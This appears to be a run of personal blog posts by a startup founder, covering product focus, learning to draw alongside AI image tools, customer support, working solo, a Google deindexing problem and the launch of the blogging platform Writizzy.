I built a company that ended up getting big (more than 600 people). And that's not always easy to manage. Especially because you constantly need to reaffirm what you are, and what you're not. We often talk about enshittification, and it happens a lot with software that grows too much. They get worse because they need to keep pleasing new users, new needs, address every edge case. This can create incredibly powerful tools, but also incredibly complex ones, and sometimes that complexity gets dumped straight onto the user. To be clear, I'm not saying it's inevitable. There are good products that have managed to grow well. But people don't realize the difficulty behind that growth: - knowing how to say no - knowing how to hide complexity. Because complexity doesn't mean complicated - knowing when to cut things Building a product is **making choices**. And all of this also applies to how you talk about your product. In the beginning, it's authentic by definition, because it's the creators talking directly. Sometimes it's clumsy, but it's direct, it's opinionated. The creator says where they want to go, what they are, and what they're not. Then over time, teams take over communications. You need to appeal to more people, attract new user segments, have a smoother message. There's a real risk at that point: trying to please everyone, you end up pleasing no one. I was having this conversation earlier with Thomas about [writizzy](https://writizzy.com)'s homepage. It's deliberately very clean, very simple. Just a manifesto. That's it. It's rare to do that for a company with several million dollars in annual revenue. Because **you need to convert, right?!** I think in the beginning, you should focus on saying who you are. With my previous company, we had a manifesto for the first year. That manifesto laid out who we were and what we wanted to do. > You're free to work freely People coming to the site didn't need to scroll for 5 minutes through dozens of beautifully designed blocks. The truth is, for a product you don't know, nobody does that. A new visitor needs to decide whether to continue in less than 10 seconds. There needs to be a strong statement somewhere that hooks them. And for us, that statement is who we are. And who we're not. **A blogging platform that doesn't waste your time.** This phrase isn't positive. Someone pointed that out to us. Why not just say "A blogging platform that saves your time"? True. It's more consensual. But we just showed up. We're inevitably going to be compared to others. That's natural. What the hell are we doing here? We're frustrated, and we're building this product in opposition to something. We want to create a simple product. But not simplistic. And beyond that, we want to give people back the ability to write easily, without being forced to show off on their professional network or create fake engagement on some bot-filled social media platform. Maybe tomorrow our homepage will be full of colorful blocks with flashy marketing slogans. Or not.

0 views
Hugo 3 months ago

Can You Still Learn to Draw in the Age of AI?

I started drawing as a teenager because I loved comics and several people around me worked or had worked in bookstores. I copied everything I could—comic book characters, European BDs. I got good at copying, but without mentors, I eventually plateaued. Then studies took over, professional life began, and I stopped drawing. Here are some of the last drawings made in 1999 : ::Gallery --- photos: - src: "https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1762035986119-latlktl.jpg" alt: "Magneto" - src: "https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1762035990247-zmqo757.jpg" alt: "Xmen" - src: "https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1762035995600-0vi7vkk.jpg" alt: "Witchblade" --- :: ## The golden age of Youtube But in 2018, I thought we were living in amazing times. There were now tons of online resources to learn from. I found hundreds of talented artists on YouTube who reignited my desire to learn. I finally had everything at my fingertips to understand the basics I'd missed when I was younger: the Loomis method, proportions, perspective, inking techniques... So [I started again](https://www.instagram.com/corwinhakanai/). I drew traditionally with pencil, then ink, tried watercolor, and finally digital drawing. I felt steady progress, even though drawing is one of those skills where learning happens in plateaus. There are tough moments where you stagnate, and then something clicks and you leap forward again. ![Moon knight I drew for Inktober 2021](https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1762036626305-0pqp4c5.jpg)It was better, but I still I felt limited, especially since I wanted to write stories and tell them through drawings. The gap between being able to reproduce a drawing correctly and bringing a story to life is massive. But that's part of the game. Drawing is learned slowly, in stages. I'd learned a lot, but now I needed to tackle composition rules, master lighting, understand how to structure a story, how to chain shots to guide the reader's eye to the right place, lettering, and many other things. ## And then AI arrived. DALL-E was born in 2021. Midjourney followed in 2022. Today in 2025, these AIs are incredible at creating drawings that I still can't produce after several years of training. A professional will always be better, but only after many, many years of experience. A beginner like me is quickly discouraged by the gap between my current knowledge and the minimum level needed to at least match an AI. That’s what I call **“the AI wall”**. Digital tools got me back into drawing in 2018, but AI cooled my enthusiasm a few years later. I haven't drawn in a year. My last drawing post [on Instagram](https://www.instagram.com/corwinhakanai/) was at the end of 2023. And I'm conflicted. I see people who, on the contrary, found new motivation in it. They couldn't draw but are now able to tell a story in comic form. Overall, I could do that because the story I have in mind could use this medium. You could say it's the story that matters more than the drawing. There are plenty of counter-examples, but let's assume it's true for the sake of argument. Except I don't want to learn how to prompt an AI. It's less exciting than learning to master your line work and thinking about character design or composition. ## What about software development ? And in those moments, I draw a parallel with my job as a developer. I've reached a point where, like the professional artists I admire, AI doesn't scare me too much. I know how to use it as a tool and I'm still capable of doing what it produces. I can go faster with it, but also because I master the equivalent of the basic rules of drawing for my profession. I understand architecture, UX, security, etc. I am above the AI wall and I'm looking down from above. But what about young people entering the tech industry today who face the same AI wall I have to climb as an artist? Who's going to take the time to learn the basics? I was born in the last century. The year 2000 made me dream. There was a kind of technological mythology where we'd end up delegating all the tedious tasks to machines so we could focus on what interests us most: discussion, games, arts, creativity. And I admit I feel like we got a bit lost along the way and did the opposite. I hope I'm wrong. On the other hand, will they be just as important in the future? In the past, driving meant adjusting the dynamo, setting the choke to enrich the air-fuel mixture, cranking a handle to start the engine. I imagine you needed to know much more about mechanics than you do today. But that doesn't stop me from driving today. Cars have evolved. Computing tools are evolving too. Once AI masters all the basic aspects, won't the issue simply be knowing how to properly dialogue with an AI? In the same way that some new comic book authors can produce by prompting an AI. In fact, their job has changed compared to their equivalents from 20 years ago. And it's quite likely that this will be the case for software development in the future.

0 views
Hugo 4 months ago

Having a good customer support isn't optional

I'm one of those people who consider support service crucial. I hate products where customer service is absent, when they give irrelevant answers, or when they half-ass issues by dragging out resolution times hoping you'll just give up. It's a differentiating factor between two products. It can take a tool from "ok tier" to "top tier" just because you have humans who are competent and actually solve your problems. The reverse is true. A good product can become "meh tier" if it's poorly served by its customer service. I talked a while back with [Jonathan Lefèvre](https://jonathanlefevre.com/) who wrote a book about how much of Capitaine Train's strength came from the quality of their support. If you're interested in the book: ["L'obsession du service client"](https://amzn.to/4n0TUge), you know what to do (sorry, it’s in French). Customer service is part of UX in the broadest sense. Many people think UX is just a coat of paint you slap on a website. That's not what UX is - it's the entire user experience: how you're addressed, how your problems are solved, how APIs are designed, the documentation. It's what makes Stripe beloved for dev experience, why Amazon keeps crushing it. Anyway, I care about this stuff. And right now, it's pretty cool - I've had a bunch of recent exchanges on [hakanai.io](http://hakanai.io) with users. And I'm quite proud of the feedback: > I have also looked at other newsletter systems, but yours is the best so far because of the RSS feeds and the ability to edit the email appearance through the MJML coding. > By the way, very good support > Oh, great, let me tell you that this is one of the best supports I have experienced, thank you so much > Hey, just wanted to thank you for this feature, already tested and everything was perfect!!! Will do any future recommendations I see for the platform. Thanks!!!! So yeah. Building a company has ups and downs. This kind of message helps put the rough moments in perspective.

0 views
Hugo 4 months ago

What I Missed Working Solo

Building a product alone is hard. Not exactly breaking news, I know. But I don't think everyone gets why it's actually hard. - Some say it's the financial risk. - Others think it's not having all the necessary skills—development, sales, marketing, etc. - And some imagine it can't scale. I have trouble taking these three obstacles seriously. Developing software doesn't cost much, at least for building a prototype and testing it with small audiences. Scaling is a false problem. There are plenty of examples of solopreneurs making substantial revenue without needing to copy Netflix or Google. And even if it became an issue one day, that's what I'd call a good problem to have. As for learning, with blogs, online videos, and AI, it's now possible to do a lot on your own. But that last point hides another problem. The issue isn't so much not having all the necessary skills, but not having conversations. ## Why I Know This I started working as a freelancer in 2010. And even though I loved it, I quickly connected with a group of Parisian freelancers called "les zindeps." In 2011, I created a kind of freelance collective, an experimental company called Lateral-thoughts. That led to another company I founded in early 2013: Malt. Working with others, at least for me, has always been an accelerator. Every discussion within these different groups created opportunities, little sparks that each lit fires, ultimately leading me to build a company with over 600 people. So, first thing: group work is an echo chamber that stimulates creativity. Working in a group is also motivation to do more. Again, this is obviously personal, but being in a group can make the difference between procrastination and action. I'm sensitive to social pressure, plus constantly being stimulated by new ideas. Finally, working in a group allows you to challenge yourself. You're rarely right on your own. I love those discussions that sometimes challenge certainties, change your mind, and find more inventive solutions. But I became a solopreneur again a year ago. ## Going Solo Again Over the past year, I launched rssfeedpulse, which became blogtally, then [hakanai.io](http://hakanai.io). I'm happy with the result—the product is nice. But let's be honest, it's growing slowly. There are probably many reasons for that. One of them is that working alone, I deprived myself of some creativity, I set fewer constraints for myself, and I had no pushback—either to pivot the product or even kill it. I'm not going to do that. I'm not killing [hakanai.io](http://hakanai.io). On the contrary, I'd like to test other approaches around the same concepts. ## Trying Something Different Not long ago, I talked with [Thomas Sanlis](https://www.thomas-sanlis.com/). He's a solopreneur who's now entered the very exclusive circle of successful solopreneurs with [uneed.best](http://uneed.best), which is gradually becoming a solid alternative to Product Hunt. He also wanted to test other ideas and work with a partner for more stimulation. So we talked and decided to try an experiment together on a new product. I'll focus on what I love most: designing and building products. Thomas will bring his new skills in communication and marketing. Though obviously, given our respective backgrounds, there will be plenty of moments where we'll do a bit of everything. That product is [writizzy](https://writizzy.com). It's a blogging platform, like Ghost or WordPress, but simpler, more modern, and more affordable. It obviously connects to the fact that I've been blogging for 20 years, created an open-source static blog generator called [bloggrify](https://bloggrify.com), and hakanai was already aimed at becoming a toolkit for static blogs. This conversation happened just two weeks ago, the product is already live, and in just two weeks I've already felt the benefits I was talking about—not working alone. We'll see what happens next :)

0 views
Hugo 4 months ago

SEO failure

Well, this is embarrassing. I just realized the SEO for [** hakanai.io **](http://hakanai.io) has been completely broken for months. SEO is theoretically my sole and unique acquisition channel for the SAAS. But: - 10 months after purchasing the domain name, I still have a mediocre ** domain rating **: 14, compared to 36 for Bloggrify and 29 for my own blog. - if I search for the name hakanai, I don't even find [** hakanai.io **](http://hakanai.io) in the search results. - 400 unique visitors per month when I was getting double that at the beginning of the year. That's a 50% drop starting in June - not exactly the growth curve you want to see. Not great... I just discovered that a large part of my pages have been deindexed. I don't know why. I wonder if Google didn't at some point consider the site fraudulent, perhaps because of the pSEO (** programmatic SEO **) that I had implemented with the [** Blog starter Kit **](https://blog-starter-kit.hakanai.io/). It also seems to correspond to the moment I moved the documentation, the blog, and the blog starter kit to subdomains. I made this choice because it was technically simpler and many sources online seemed to say that subdomains and subdirectories were equivalent for SEO. There are quite a few conflicting opinions on this. What is certain is that the current result leans more in favor of subdirectories... Anyway, I'm trying to fix it urgently. I've moved the blog and documentation back to subdirectories. And I set the entire blog starter kit to noindex to see if that changes anything. That was a week ago. For now, no result. It's a bit worrying. Let's see... If you've dealt with Google deindexing issues before, I'm all ears. And if not, well, you'll get to watch me figure it out in real-time. Maybe :)

0 views
Hugo 4 months ago

Hello World

Hello World What better way to start a new blog than with the traditional Hello World that we all learn to code when we start programming? So yes, I'm starting a new blog on Writizzy, because I'm going to eat my own dog food, as they say. My name is Hugo Lassiège. I've been blogging since 2001. I started as a writer on [developpez.com](http://developpez.com), then got my own domain ([hakanai.free.fr](http://hakanai.free.fr)) on the hosting provider everyone in France used back then: [free.fr](http://free.fr). I moved through Joomla, then WordPress. I self-hosted for a while, then got tired of it because WordPress is a pain to maintain long-term and quickly becomes bloated. So I switched to [wordpress.com](http://wordpress.com). But I quickly found it too expensive, and I was looking for a different writing experience. So I built my own static site generator with Nuxt and eventually [open-sourced it as Bloggrify](https://bloggrify.com/). A bit later, I launched [hakanai.io](http://hakanai.io) because, let's face it, a static blog lacks certain features, and I thought I could provide them. It's a SaaS that adds features like newsletters, blog analytics, and I have other ideas to turn it into a toolbox for static blogs. Still, I'm well aware that many people are looking for a much simpler experience. So eventually, after a chance encounter, I decided to start [Writizzy](https://writizzy.com) - the platform you're reading this on - which will be a managed blogging platform representing, I hope, the synthesis of over 20 years of writing blog posts. I'm not abandoning my other blog [eventuallymaking.io](http://eventuallymaking.io) where I'll continue writing more technical articles and sharing experiences from my other life as the founder of [a startup](https://www.malt.com) that did pretty well in France and Europe. This blog will be more of a journal about building in public, thoughts on entrepreneurship, and work-life balance. So, all over the place, it'll cover building Writizzy, Hakanai, Bloggrify. What works, or doesn't. And it won't really be about technical stuff - I save that for my other blog. Instead, I'll talk about experiments and... we'll see. Anyway, welcome to this blog.

0 views